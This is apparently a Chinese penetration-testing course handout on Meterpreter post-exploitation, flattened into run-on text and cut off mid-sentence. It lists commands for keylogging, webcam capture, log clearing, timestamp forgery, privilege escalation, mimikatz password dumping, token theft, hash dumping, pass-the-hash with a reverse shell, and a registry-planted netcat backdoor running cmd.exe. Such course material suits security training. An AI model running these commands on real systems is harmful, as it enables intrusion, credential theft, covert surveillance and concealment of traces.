滲透測試技術(shù) 課件 第6章-6.2-Meterpreter

MeterpreterMeterpreter是Metasploit框架中的一個擴展模塊，作為溢出成功以后的攻擊載荷使用，攻擊載荷在溢出攻擊成功以后給我們返回一個控制通道。使用它作為攻擊載荷能夠獲得目標(biāo)系統(tǒng)的一個Meterpretershell的鏈接。Meterpretershell作為滲透模塊有很多有用的功能，比如添加一個用戶、隱藏一些東西、打開shell、得到用戶密碼、上傳下載遠(yuǎn)程主機的文件、運行cmd.exe、捕捉屏幕、得到遠(yuǎn)程控制權(quán)、捕獲按鍵信息、清除應(yīng)用程序、顯示遠(yuǎn)程主機的系統(tǒng)信息、顯示遠(yuǎn)程機器的網(wǎng)絡(luò)接口和IP地址等信息。前言Meterpreter常用命令Metasploit后滲透測試模塊sessions#sessions–h查看幫助sessions-i<ID值>#進入會話-k殺死會話background#將當(dāng)前會話放置后臺run#執(zhí)行已有的模塊，輸入run后按兩下tab，列出已有的腳本info#查看已有模塊信息getuid#查看權(quán)限getpid#獲取當(dāng)前進程的pidsysinfo#查看目標(biāo)機系統(tǒng)信息ps#查看當(dāng)前活躍進程kill<PID值>殺死進程idletime#查看目標(biāo)機閑置時間reboot/shutdown#重啟/關(guān)機shell#進入目標(biāo)機cmdshell系統(tǒng)基本命令uictl開關(guān)鍵盤/鼠標(biāo)：uictl[enable/disable][keyboard/mouse/all]#開啟或禁止鍵盤/鼠標(biāo)uictldisablemouse#禁用鼠標(biāo)uictldisablekeyboard#禁用鍵盤系統(tǒng)基本命令webcam攝像頭命令：webcam_list#查看攝像頭webcam_snap#通過攝像頭拍照webcam_stream#通過攝像頭開啟視頻系統(tǒng)基本命令execute執(zhí)行文件：execute#在目標(biāo)機中執(zhí)行文件execute-H-i-fcmd.exe#創(chuàng)建新進程cmd.exe，-H不可見，-i交互系統(tǒng)基本命令migrate進程遷移：getpid#獲取當(dāng)前進程的pidps#查看當(dāng)前活躍進程migrate<pid值>#將Meterpreter會話移植到指定pid值進程中kill<pid值>#殺死進程系統(tǒng)基本命令clearav清除日志：clearav#清除windows中的應(yīng)用程序日志、系統(tǒng)日志、安全日志系統(tǒng)基本命令getwd或者pwd#查看當(dāng)前工作目錄ls#列出當(dāng)前目錄下文件cd#進入目錄search-f*pass*#搜索文件-h查看幫助catc:\\lltest\\lltestpasswd.txt#查看文件內(nèi)容upload/tmp/hack.txtC:\\lltest#上傳文件到目標(biāo)機上downloadc:\\lltest\\lltestpasswd.txt/tmp/#下載文件到本機上editc:\\1.txt#編輯或創(chuàng)建文件沒有的話，會新建文件rmC:\\lltest\\hack.txtmkdirlltest2#只能在當(dāng)前目錄下創(chuàng)建文件夾rmdirlltest2#只能刪除當(dāng)前目錄下文件夾getlwd或者lpwd#操作攻擊者主機查看當(dāng)前目錄lcd/tmp#操作攻擊者主機切換目錄基本文件系統(tǒng)命令timestomp偽造時間戳：timestompC://-h#查看幫助timestomp-vC://2.txt#查看時間戳timestompC://2.txt-fC://1.txt#將1.txt的時間戳復(fù)制給2.txt文件系統(tǒng)命令ipconfig/ifconfignetstat–anoarpgetproxy#查看代理信息route#查看路由基本網(wǎng)絡(luò)命令portfwd端口轉(zhuǎn)發(fā)：用法：portfwd[-h][add|delete|list|flush][args]選項：

-L<opt>要監(jiān)聽的本地主機（可選）

-h幫助橫幅

-l<opt>要監(jiān)聽的本地端口

-p<opt>連接到的遠(yuǎn)程端口

-r<opt>要連接到的遠(yuǎn)程主機portfwdadd-l4444-p3389-r02#端口轉(zhuǎn)發(fā),本機監(jiān)聽4444,把目標(biāo)機3389轉(zhuǎn)到本機4444rdesktop-uAdministrator-p123.com:4444#使用rdesktop來連接桌面，-u用戶名-p密碼rdesktop:4444#需要輸入用戶名和密碼遠(yuǎn)程連接基本網(wǎng)絡(luò)命令autoroute添加路由:runautoroute–h#查看幫助runautoroute-s/24#添加到目標(biāo)環(huán)境網(wǎng)絡(luò)runautoroute–p#查看添加的路由基本網(wǎng)絡(luò)命令Socks4a代理:autoroute添加完路由后，還可以利用msf自帶的sock4a模塊進行Socks4a代理autoroute添加完路由后，還可以利用msf自帶的sock4a模塊進行Socks4a代理msf>useauxiliary/server/socks4amsf>setsrvhostmsf>setsrvport1080msf>run基本網(wǎng)絡(luò)命令proxychains代理訪問：vi/etc/proxychains.conf#添加socks41080最后proxychains使用Socks4a代理訪問基本網(wǎng)絡(luò)命令Meterpreter常用命令Metasploit后滲透測試模塊信息收集的腳本位于：/usr/share/metasploit-framework/modules/post/windows/gather/usr/share/metasploit-framework/modules/post/linux/gather信息收集runpost/windows/gather/checkvm#是否虛擬機runpost/linux/gather/checkvm#是否虛擬機runpost/windows/gather/forensics/enum_drives#查看分區(qū)runpost/windows/gather/enum_applications#獲取安裝軟件信息runpost/windows/gather/dumplinks#獲取最近的文件操作runpost/windows/gather/enum_ie#獲取IE緩存runpost/windows/gather/enum_chrome#獲取Chrome緩存runpost/windows/gather/enum_patches#補丁信息runpost/windows/gather/enum_domain#查找域控常用信息收集腳本getsystem提權(quán)：命令：getsystemgetsystem工作原理：①getsystem創(chuàng)建一個新的Windows服務(wù)，設(shè)置為SYSTEM運行，當(dāng)它啟動時連接到一個命名管道。②getsystem產(chǎn)生一個進程，它創(chuàng)建一個命名管道并等待來自該服務(wù)的連接。③Windows服務(wù)已啟動，導(dǎo)致與命名管道建立連接。④該進程接收連接并調(diào)用ImpersonateNamedPipeClient，從而為SYSTEM用戶創(chuàng)建模擬令牌。然后用新收集的SYSTEM模擬令牌產(chǎn)生cmd.exe，并且我們有一個SYSTEM特權(quán)進程。提權(quán)bypassuac:內(nèi)置多個pypassuac腳本，原理有所不同，使用方法類似，運行后返回一個新的會話，需要再次執(zhí)行g(shù)etsystem獲取系統(tǒng)權(quán)限，如：useexploit/windows/local/bypassuacuseexploit/windows/local/bypassuac_injectionusewindows/local/bypassuac_vbsusewindows/local/ask提權(quán)bypassuac.rb腳本使用：msf>useexploit/windows/local/bypassuacmsf>setSESSION1msf>run提權(quán)可先利用enum_patches模塊收集補丁信息，然后查找可用的exploits進行提權(quán)meterpreter>runpost/windows/gather/enum_patches#查看補丁信息msf>useexploit/windows/local/ms13_053_schlampereimsf>setSESSION1msf>exploit內(nèi)核漏洞提權(quán)l(xiāng)oadmimikatz#helpmimikatz查看幫助（msf6中mimikat已被kiwi集成，可以loadkiwi加載）wdigest#獲取Wdigest密碼mimikatz_command-fsamdump::hashes#執(zhí)行mimikatz原始命令mimikatz_command-fsekurlsa::searchPasswordsmimikatz抓取密碼enumdesktops#查看可用的桌面getdesktop#獲取當(dāng)前meterpreter關(guān)聯(lián)的桌面set_desktop#設(shè)置meterpreter關(guān)聯(lián)的桌面-h查看幫助screenshot#截屏useespia#或者使用espia模塊截屏然后輸入screengrabrunvnc#使用vnc遠(yuǎn)程桌面連接遠(yuǎn)程桌面&截屏1.getgui命令：rungetgui–h#查看幫助rungetgui-e#開啟遠(yuǎn)程桌面rungetgui-ulltest2-p123456#添加用戶rungetgui-f6661–e#3389端口轉(zhuǎn)發(fā)到6661getgui系統(tǒng)不推薦，推薦使用runpost/windows/manage/enable_rdpgetgui添加用戶時，有時雖然可以成功添加用戶，但是沒有權(quán)限通過遠(yuǎn)程桌面登陸開啟rdp&添加用戶2.enable_rdp腳本：runpost/windows/manage/enable_rdp#開啟遠(yuǎn)程桌面runpost/windows/manage/enable_rdpUSERNAME=www2PASSWORD=123456#添加用戶runpost/windows/manage/enable_rdpFORWARD=trueLPORT=6662#將3389端口轉(zhuǎn)發(fā)到6662腳本位于/usr/share/metasploit-framework/modules/post/windows/manage/enable_rdp.rb通過enable_rdp.rb腳本可知：開啟rdp是通過reg修改注冊表；添加用戶是調(diào)用cmd.exe通過netuser添加；端口轉(zhuǎn)發(fā)是利用的portfwd命令開啟rdp&添加用戶keyscan_start#開始鍵盤記錄keyscan_dump#導(dǎo)出記錄數(shù)據(jù)keyscan_stop#結(jié)束鍵盤記錄鍵盤記錄usesniffersniffer_interfaces#查看網(wǎng)卡sniffer_start2#選擇網(wǎng)卡開始抓包sniffer_stats2#查看狀態(tài)sniffer_dump2/tmp/lltest.pcap#導(dǎo)出pcap數(shù)據(jù)包sniffer_stop2#停止抓包sniffer抓包注冊表基本命令：reg–h-d注冊表中值的數(shù)據(jù).-k注冊表鍵路徑-v注冊表鍵名稱

enumkey枚舉可獲得的鍵setval設(shè)置鍵值queryval查詢鍵值數(shù)據(jù)注冊表操作注冊表設(shè)置nc后門：upload/usr/share/windows-binaries/nc.exeC:\\windows\\system32#上傳ncregenumkey-kHKLM\\software\\microsoft\\windows\\currentversion\\run#枚舉run下的keyregsetval-kHKLM\\software\\microsoft\\windows\\currentversion\\run-vlltest_nc-d'C:\windows\system32\nc.exe-Ldp443-ecmd.exe'#設(shè)置鍵值regqueryval-kHKLM\\software\\microsoft\\windows\\currentversion\\Run-vlltest_nc#查看鍵值nc-v44443#攻擊者連接nc后門注冊表操作incognito假冒令牌：useincognito#helpincognito查看幫助list_tokens-u#查看可用的tokenimpersonate_token'NTAUTHORITY\SYSTEM'#假冒SYSTEMtoken或者impersonate_tokenNT\AUTHORITY\\SYSTEM#不加單引號需使用\\execute-fcmd.exe-i–t#-t使用假冒的token執(zhí)行或者直接shellrev2self#返回原始token令牌操作steal_token竊取令牌：steal_token<pid值>#從指定進程中竊取token先psdrop_token#刪除竊取的token令牌操作獲取哈希：runpost/windows/gather/smart_hashdump#從SAM導(dǎo)出密碼哈希#需要SYSTEM權(quán)限哈希利用PSExec哈希傳遞：通過smart_hashdump獲取用戶哈希后，可以利用psexec模塊進行哈希傳遞攻擊前提條件：①開啟445端口smb服務(wù)；②開啟admin$共享msf>useexploit/windows/smb/psexecmsf>setpayloadwindows/meterpreter/reverse_tcpmsf>setLHOST34msf>setLPORT443msf>setRHOST44msf>setSMBUserAdministratormsf>setSMBPassaad3b4*****04ee:5b5f00*****c424cmsf>setSMBDomainWORKGROUP#域用戶需要設(shè)置SMBDomainmsf>exploit哈希利用metasploit自帶的后門有兩種方式啟動的，一種是通過啟動項啟動(persistence)，一種是通過服務(wù)啟動(metsvc)，另外還可以通過persistence_exe自定義后門文件。1.persistence啟動項后門：在C:\Users***\AppData\Local\Temp\目錄下，上傳一個vbs腳本在注冊表HKLM\S